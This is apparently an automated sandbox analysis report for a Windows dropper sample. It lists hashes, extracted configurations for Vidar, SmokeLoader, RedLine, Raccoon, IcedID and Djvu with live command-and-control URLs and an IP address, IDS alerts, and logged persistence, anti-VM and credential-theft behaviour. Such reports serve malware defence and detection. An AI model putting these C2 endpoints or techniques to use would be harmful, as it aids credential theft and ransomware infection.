Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
1180s -
max time network
2706s -
platform
windows10_x64 -
resource
win10-de-20211014 -
submitted
22-10-2021 15:55
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20211014
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
redline
205.185.119.191:60857
Extracted
vidar
41.5
903
https://mas.to/@xeroxxx
-
profile_id
903
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
icedid
1875681804
enticationmetho.ink
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exerundll32.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7140 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6796 1964 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7916 1964 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8000 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4480 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4008 1964 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 9040 1964 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral7/memory/3804-276-0x0000000004A00000-0x0000000004A1F000-memory.dmp family_redline behavioral7/memory/3804-283-0x0000000004AB0000-0x0000000004ACD000-memory.dmp family_redline behavioral7/memory/4364-309-0x0000000000400000-0x000000000043C000-memory.dmp family_redline behavioral7/memory/4364-310-0x00000000004368BE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe family_socelars C:\Users\Admin\Pictures\Adobe Films\6RfiwzZkIPJvopWxqd4ouGmM.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 2288 created 1316 2288 WerFault.exe ADP8vL2SLdGPH8L7FyA9nk0u.exe PID 4540 created 2280 4540 WerFault.exe 3fQcxDlp43cF_Lkgp2hF3etw.exe PID 2236 created 2760 2236 WerFault.exe NpQFFR5PLBhAmQZ0HxCbwNxm.exe -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral7/memory/2280-179-0x0000000000B80000-0x0000000000C56000-memory.dmp family_vidar behavioral7/memory/2280-191-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral7/memory/1844-233-0x0000000001AC0000-0x0000000001B98000-memory.dmp family_vidar behavioral7/memory/2760-277-0x0000000000D60000-0x0000000000E36000-memory.dmp family_vidar behavioral7/memory/2760-289-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar -
Blocklisted process makes network request 10 IoCs
Processes:
schtasks.exemsiexec.exeflow pid process 536 7064 schtasks.exe 1813 8584 msiexec.exe 1812 8584 msiexec.exe 1851 8584 msiexec.exe 1956 8584 msiexec.exe 1957 8584 msiexec.exe 1974 8584 msiexec.exe 2020 8584 msiexec.exe 2021 8584 msiexec.exe 2027 8584 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
DYbALA.exeCalculator.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Calculator.exe -
Executes dropped EXE 64 IoCs
Processes:
gckOBeKwEc_9Tb1WLDr_o55o.exe6RfiwzZkIPJvopWxqd4ouGmM.exeZKiBxX_lZY4IIzpkXK7L8Xle.exeADP8vL2SLdGPH8L7FyA9nk0u.exe3fQcxDlp43cF_Lkgp2hF3etw.exezt3fotSIgq8mlNObpN9zV4Ri.exeE8SL1DWYDQfbr15Eley5KWls.exeUv2OLZQGQUISQFphMrVjFyks.exeI5ybN5GcFFp2qz4bO557reWX.exe07110_23KBD6OrY29SHSSWf2.exem4B4l9UNQFjYJy2qOZ8ywGcq.exeE7hLWHgMHAmG2ptzTZk60djt.exeuIhpaXRSRc02XMvQzI27rw3i.exeCObebYmiTdY_PuwpkFiVDpKe.exeYTDtEif11P99NgeKwT6fC4ch.exee4XxYUrzhL2kFffGJzG8cKA3.exeCQ4wIy1JUrHTND_rGM2Jhn8d.exeS8LGJghE7EKxPiR6DNQktZgV.exeCObebYmiTdY_PuwpkFiVDpKe.exeextd.exee4XxYUrzhL2kFffGJzG8cKA3.tmpextd.exeuIhpaXRSRc02XMvQzI27rw3i.executm3.exeDownFlSetup999.exeextd.exeinst3.exenetsh.exeNpQFFR5PLBhAmQZ0HxCbwNxm.exe1NfON6dm6F_QWOrKdYH7I84U.exebuild.exe8A71.exeCQ4wIy1JUrHTND_rGM2Jhn8d.exeDYbALA.exeCQ4wIy1JUrHTND_rGM2Jhn8d.exesvchost.exe8pWB.eXEnksQBGgk4aKK7MdTUg8YET4X.exeTransmissibility.exeC9E7.exeuWM88AHiVsIghHqLufZXuMxT.exeHpQtObz62dT6szj1j12odrbQ.exeextd.exeKUuRjtWwC9mcEybDnxKPC2fz.exe1HpT7fOCjRqwevyYF3NF9uzi.exehfRWQcdalGPlSdecGjYWgh99.exehfRWQcdalGPlSdecGjYWgh99.tmp0Ynwrny1xR6Ce3aFOdXaV7vd.exee3ciN45LF9YSOx5uTssM_4x6.exeCalculator.exeF190.exekPBhgOaGQk.exe9CC.exesetup.exefoldershare.exeVelyxomere.exeKakanenytae.exefoldershare.exeNyshylamoqo.exeLotatiqama.exeCA7D.exeGcleanerEU.exeinstaller.exeany.exepid process 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe 1268 ZKiBxX_lZY4IIzpkXK7L8Xle.exe 1316 ADP8vL2SLdGPH8L7FyA9nk0u.exe 2280 3fQcxDlp43cF_Lkgp2hF3etw.exe 3260 zt3fotSIgq8mlNObpN9zV4Ri.exe 2080 E8SL1DWYDQfbr15Eley5KWls.exe 2328 Uv2OLZQGQUISQFphMrVjFyks.exe 3044 I5ybN5GcFFp2qz4bO557reWX.exe 1844 07110_23KBD6OrY29SHSSWf2.exe 3804 m4B4l9UNQFjYJy2qOZ8ywGcq.exe 404 E7hLWHgMHAmG2ptzTZk60djt.exe 2360 uIhpaXRSRc02XMvQzI27rw3i.exe 2096 CObebYmiTdY_PuwpkFiVDpKe.exe 3584 YTDtEif11P99NgeKwT6fC4ch.exe 432 e4XxYUrzhL2kFffGJzG8cKA3.exe 1008 CQ4wIy1JUrHTND_rGM2Jhn8d.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 700 CObebYmiTdY_PuwpkFiVDpKe.exe 3612 extd.exe 3344 e4XxYUrzhL2kFffGJzG8cKA3.tmp 3688 extd.exe 4020 uIhpaXRSRc02XMvQzI27rw3i.exe 4352 cutm3.exe 4456 DownFlSetup999.exe 4480 extd.exe 4556 inst3.exe 4520 netsh.exe 2760 NpQFFR5PLBhAmQZ0HxCbwNxm.exe 4760 1NfON6dm6F_QWOrKdYH7I84U.exe 5108 build.exe 2164 8A71.exe 1100 CQ4wIy1JUrHTND_rGM2Jhn8d.exe 4560 DYbALA.exe 4364 CQ4wIy1JUrHTND_rGM2Jhn8d.exe 2000 svchost.exe 3540 8pWB.eXE 2476 nksQBGgk4aKK7MdTUg8YET4X.exe 4844 Transmissibility.exe 4668 C9E7.exe 4408 uWM88AHiVsIghHqLufZXuMxT.exe 2628 HpQtObz62dT6szj1j12odrbQ.exe 4188 extd.exe 4568 KUuRjtWwC9mcEybDnxKPC2fz.exe 5116 1HpT7fOCjRqwevyYF3NF9uzi.exe 4368 hfRWQcdalGPlSdecGjYWgh99.exe 4224 hfRWQcdalGPlSdecGjYWgh99.tmp 4600 0Ynwrny1xR6Ce3aFOdXaV7vd.exe 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 5552 Calculator.exe 5812 F190.exe 6008 kPBhgOaGQk.exe 5048 9CC.exe 5132 setup.exe 4184 foldershare.exe 4516 Velyxomere.exe 5304 Kakanenytae.exe 4536 foldershare.exe 4960 Nyshylamoqo.exe 5976 Lotatiqama.exe 5844 CA7D.exe 4948 GcleanerEU.exe 6148 installer.exe 6264 any.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe upx C:\Users\Admin\AppData\Local\Temp\DC7C.tmp\DC7D.tmp\extd.exe upx -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
C9E7.exesvchost.exeYTDtEif11P99NgeKwT6fC4ch.exeE7hLWHgMHAmG2ptzTZk60djt.exesvchost.exeI5ybN5GcFFp2qz4bO557reWX.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C9E7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C9E7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YTDtEif11P99NgeKwT6fC4ch.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E7hLWHgMHAmG2ptzTZk60djt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion I5ybN5GcFFp2qz4bO557reWX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YTDtEif11P99NgeKwT6fC4ch.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E7hLWHgMHAmG2ptzTZk60djt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion I5ybN5GcFFp2qz4bO557reWX.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1NfON6dm6F_QWOrKdYH7I84U.exeVelyxomere.exeNyshylamoqo.exeCalculator.exeCalculator.exeCalculator.exeFri051e1e7444.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation 1NfON6dm6F_QWOrKdYH7I84U.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Velyxomere.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Nyshylamoqo.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
I5ybN5GcFFp2qz4bO557reWX.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Wine I5ybN5GcFFp2qz4bO557reWX.exe -
Loads dropped DLL 64 IoCs
Processes:
S8LGJghE7EKxPiR6DNQktZgV.exee4XxYUrzhL2kFffGJzG8cKA3.tmphfRWQcdalGPlSdecGjYWgh99.tmpe3ciN45LF9YSOx5uTssM_4x6.exeF190.exesetup.exemsiexec.exeinstaller.exeautosubplayer.exeautosubplayer.exeCalculator.exeMsiExec.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeMicrosoftEdgeCP.exepid process 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 3344 e4XxYUrzhL2kFffGJzG8cKA3.tmp 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 4224 hfRWQcdalGPlSdecGjYWgh99.tmp 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 4200 e3ciN45LF9YSOx5uTssM_4x6.exe 5812 F190.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 5132 setup.exe 5132 setup.exe 4204 msiexec.exe 4204 msiexec.exe 6148 installer.exe 6148 installer.exe 6432 autosubplayer.exe 6432 autosubplayer.exe 5132 setup.exe 6992 autosubplayer.exe 5132 setup.exe 5552 Calculator.exe 6148 installer.exe 5132 setup.exe 5552 Calculator.exe 5552 Calculator.exe 4580 MsiExec.exe 4580 MsiExec.exe 5132 setup.exe 6992 autosubplayer.exe 1844 Calculator.exe 2140 S8LGJghE7EKxPiR6DNQktZgV.exe 5624 Calculator.exe 5624 Calculator.exe 5624 Calculator.exe 6580 Calculator.exe 6580 Calculator.exe 6580 Calculator.exe 5708 Calculator.exe 5708 Calculator.exe 5708 Calculator.exe 5628 Calculator.exe 5628 Calculator.exe 5628 Calculator.exe 5624 Calculator.exe 5612 Calculator.exe 5628 Calculator.exe 5612 Calculator.exe 5612 Calculator.exe 5612 Calculator.exe 6176 Calculator.exe 6176 Calculator.exe 6176 Calculator.exe 4268 Calculator.exe 4268 Calculator.exe 4268 Calculator.exe 6248 MicrosoftEdgeCP.exe 6248 MicrosoftEdgeCP.exe 6248 MicrosoftEdgeCP.exe 6248 MicrosoftEdgeCP.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\E7hLWHgMHAmG2ptzTZk60djt.exe themida behavioral7/memory/404-218-0x0000000000E90000-0x0000000000E91000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
8EED.exeI5ybN5GcFFp2qz4bO557reWX.exeDYbALA.exeCalculator.exesetup.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fe059447-cd3e-4d30-b78a-a08e44fc527e\\8EED.exe\" --AutoStart" 8EED.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\S8LGJghE7EKxPiR6DNQktZgV = "\"C:\\ProgramData\\Application Data\\S8LGJghE7EKxPiR6DNQktZgV.exe\"" I5ybN5GcFFp2qz4bO557reWX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Jajaequsishae.exe\"" DYbALA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\build = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\BroadcastMsg_1634221883\\build.exe\"" I5ybN5GcFFp2qz4bO557reWX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Katozhopawe.exe\"" Calculator.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\rastlsext\\RuntimeBroker.exe\"" I5ybN5GcFFp2qz4bO557reWX.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
YTDtEif11P99NgeKwT6fC4ch.exeE7hLWHgMHAmG2ptzTZk60djt.exesvchost.exeC9E7.execmd.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YTDtEif11P99NgeKwT6fC4ch.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E7hLWHgMHAmG2ptzTZk60djt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C9E7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 21 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ipinfo.io 172 ipinfo.io 235 ipinfo.io 352 ipinfo.io 1487 ip-api.com 18 ipinfo.io 175 ipinfo.io 351 ipinfo.io 4289 api.2ip.ua 7890 api.2ip.ua 236 ipinfo.io 766 api.2ip.ua 770 api.2ip.ua 1063 api.2ip.ua 4262 api.2ip.ua 5625 api.2ip.ua 6840 api.2ip.ua 171 ipinfo.io 176 ipinfo.io 251 ip-api.com 364 ip-api.com -
Drops file in System32 directory 10 IoCs
Processes:
I5ybN5GcFFp2qz4bO557reWX.exesvchost.exesvchost.exedescription ioc process File created C:\Windows\SysWOW64\rastlsext\RuntimeBroker.exe I5ybN5GcFFp2qz4bO557reWX.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\S8LGJghE7EKxPiR6DNQktZgV svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File created C:\Windows\SysWOW64\rastlsext\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d I5ybN5GcFFp2qz4bO557reWX.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
E7hLWHgMHAmG2ptzTZk60djt.exeI5ybN5GcFFp2qz4bO557reWX.exeC9E7.exepid process 404 E7hLWHgMHAmG2ptzTZk60djt.exe 3044 I5ybN5GcFFp2qz4bO557reWX.exe 4668 C9E7.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
CObebYmiTdY_PuwpkFiVDpKe.exeuIhpaXRSRc02XMvQzI27rw3i.exenetsh.exeCQ4wIy1JUrHTND_rGM2Jhn8d.exe8EED.exe8EED.exeMicrosoftEdgeCP.exebuild3.exesvchost.exebuild2.exemstsca.exedescription pid process target process PID 2096 set thread context of 700 2096 CObebYmiTdY_PuwpkFiVDpKe.exe CObebYmiTdY_PuwpkFiVDpKe.exe PID 2360 set thread context of 4020 2360 uIhpaXRSRc02XMvQzI27rw3i.exe uIhpaXRSRc02XMvQzI27rw3i.exe PID 4520 set thread context of 2164 4520 netsh.exe 8A71.exe PID 1008 set thread context of 4364 1008 CQ4wIy1JUrHTND_rGM2Jhn8d.exe CQ4wIy1JUrHTND_rGM2Jhn8d.exe PID 1356 set thread context of 7976 1356 8EED.exe 8EED.exe PID 8532 set thread context of 8672 8532 8EED.exe 8EED.exe PID 8176 set thread context of 8908 8176 MicrosoftEdgeCP.exe bwusvrr PID 5724 set thread context of 6628 5724 build3.exe build3.exe PID 2248 set thread context of 5856 2248 svchost.exe svchost.exe PID 9172 set thread context of 812 9172 build2.exe build2.exe PID 5872 set thread context of 6012 5872 mstsca.exe mstsca.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exezt3fotSIgq8mlNObpN9zV4Ri.exeZKiBxX_lZY4IIzpkXK7L8Xle.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll 